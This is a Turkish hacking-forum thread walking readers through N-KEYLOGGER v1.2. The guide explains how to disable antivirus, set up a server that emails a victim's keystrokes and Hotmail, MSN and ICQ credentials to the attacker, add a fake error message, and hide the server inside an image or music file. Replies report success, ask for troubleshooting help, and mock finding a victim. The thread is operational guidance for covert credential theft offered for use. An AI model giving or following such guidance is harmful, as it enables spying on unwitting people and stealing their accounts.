Resİm-mÜzİk İÇİne Keylogger Atma ++resİmlİ Anlatim

hantala

Kıdemli Üye
20 Tem 2007
3,277
33
HER YERDEYİM VALA:D
ÖNCELİKLE BAĞIRA BAĞIRA DİYİMKİ SONRA VİRÜS WAR DEMEYİN ANTİVİRÜSLERİNİZİ CLOSE YAPIN KEYLOGGER BU YANLIŞ ANLAMAYIN VİRÜSLE HACK YAPACAKSINIZ ONA GÖRE SONRA YORUM YAPMAYIN VİRÜS WAR DİYE

Programın Amacı Linki ve Tanıtımı

Adı ve Sürümü: N-KEYLOGGER v1.2 | RAR'da V1 Yazıyor..??

Programın Linki:
İndir!

Tanıtım:

N-KEYLOGGER, Visual Basic'de programlanmış bir keylogger yazılımıdır. Keylogger'ın amacı kurbanınızın bilgisayarını dinlemektir. Bundan kasıt, PC'de hangi uygulamalar açık hangi sitede geziniliyor, klavye ile ne yazılıyor bütün bunların hepsinin mailimize gelmesidir.

N-KEYLOGGER, diğer keylogger'lar dan farklı olarak açılan bilgisayarın Hotmail, MSN, ICQ, Miranda vs. account bilgilerini doğrudan mailimize yollamasıdır.

N-KEYLOGGER, sisteme yayılış ve yerleşme açısından türdeşlerinden farklı oluşundan dolayı, anti-virüs programlarına yakalanmamaktadır. Bir kere yayıldı mı, bünyesindeki Trojan Silici haricinde hiç bir yazılım ile silinemez.

Programın Kullanımı:

Program, türdeşleri gibi iki kısımdan oluşur. Bunlar, server ve client'tir.

Client, bizim server'ı kendi konfigurasyonumuza göre hazırlamamıza yardımcı olur. N-KEYLOGGER v1.2.exe isimli dosyadır.

Server ise bizim yaratacağımız ve bunu karşı tarafa gönderip onun açmasını sağlayacağımız küçük progrYasak KelimelerYasak KelimelerYasak KelimelerYasak KelimelerYasak Kelimelertır. Bu progrYasak KelimelerYasak KelimelerYasak KelimelerYasak KelimelerYasak Kelimeler, logları mailimize göndermek için internet bağlantısını kullanmamızı sağlar.

Programın Arayüzü & Resimli Anlatım:

Download ettiğiniz dosyayı, şekildeki gibi RAR'dan çıkarınız. Daha sonra elinize 2 dosya ve 1 klasör gelecektir. OCX dosyasını, C:/Windows/System32 'ye kopyalayınız. Daha sonra N-KEYLOGGER v1.2.exe 'yi çalıştırınız.

E_mail Adresi:

Bu bölüm, logların geleceği maili belirlemeniz içindir. Mail kutunuza bir çok bilgi geleceği için @yahoo.com veya @gmail.com maili girmeniz ZORUNLUDUR. Eğer bu hesaplardan hiç birine sahip değilseniz, www.yahoo.com 'dan bir tane edinin.

SMTP Server Adresi:

Burayı yazdığınız mail adresine göre doldurmanız gerekiyor. Şöyle ki;

@yahoo.com uzantılı mail yazdıyasınız, mx1.mail.yahoo.com yazınız. Eğer @gmail.com yazdıysanız, gsmtp185.google.com yazınız.

Mailinize gönderimin çalışıp çalışmadığını kontrol etmek için, Test Maili Gönder'e tıklayınız. Eğer @yahoo.com mail girdiyseniz, mesaj Bulk klasörüne gidecektir, bilginize.

Sahte Hata Mesajı Yollamak:

Server açılınca bir hata vermesini istiyorsanız bu bölümü aktif hale getirin. Eğer aktif hale getirmezseniz, dosya açıldığında hiçbir şey olmayacak, dolayısıyla gönderdiğiniz kişi bir şeyler olduğunu anlayacaktır.

Server'ı Dosya ile Birleştirmek:

Oluşturacağımız ve hacklemek istediğimiz kişinin açacağı dosyaya server denir. Server'ı yutturmak için en iyi yöntem server'ı bir dosya

İçine Saklamaktadır ..

Kendi PC'nizde Açtıysanız..

Eğer dosyayı yanlışlıkla kendi bilgisayarınızda açtıysanız 60 saniye kadar bekleyip Trojan Temizle'ye basınız. Hiç bir Antivirüsün silemeyeceği bu dosya silinecektir.

Mail Bildirimi:

Moderatör tarafında düzenlendi:

captivity

Yeni üye
30 Ağu 2007
1
0
Saolasin Bunu Önceden Hem Pro Agentle Yaptim Hemde Keyloggerle Ama Senİnkİnden SonuÇ Aldim Eyw...

F!rAr!

Üye
24 Ağu 2007
84
1
AlLaH BiLiR
Yha iyi hoşta bu trojeni oluştur dediğimde server dosyası nereye gidiyo masaüstüne gelmiyo..! Biri yardımcı olursa sevinirim..

ma7d

Yeni üye
20 Tem 2007
38
0
yaa abi yardım edn rarı yükledim ,virüs proframınıda kapattım fakat rardan çıkarırken hata verio,ocx dosyası gelmio lften yardım edn....

hantala

Kıdemli Üye
20 Tem 2007
3,277
33
HER YERDEYİM VALA:D
bakın aratmayın arkadaşlar hani dosya 1 dosya 2 diye seçme bölümü var yha..işte oraya dosya seç bölümüne server yazın tamam diyin sonra resim seçin yada müzik ...sonra yeni oluşacak dosyanın yerini seçin...icon seçin keylogger hazır...

soner_64

Yeni üye
6 Tem 2007
2
0
abi herşeyi yaptım server falan oldu sadece şimdi yutacak bi enayi bulmada sıra huhauhauha :D

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.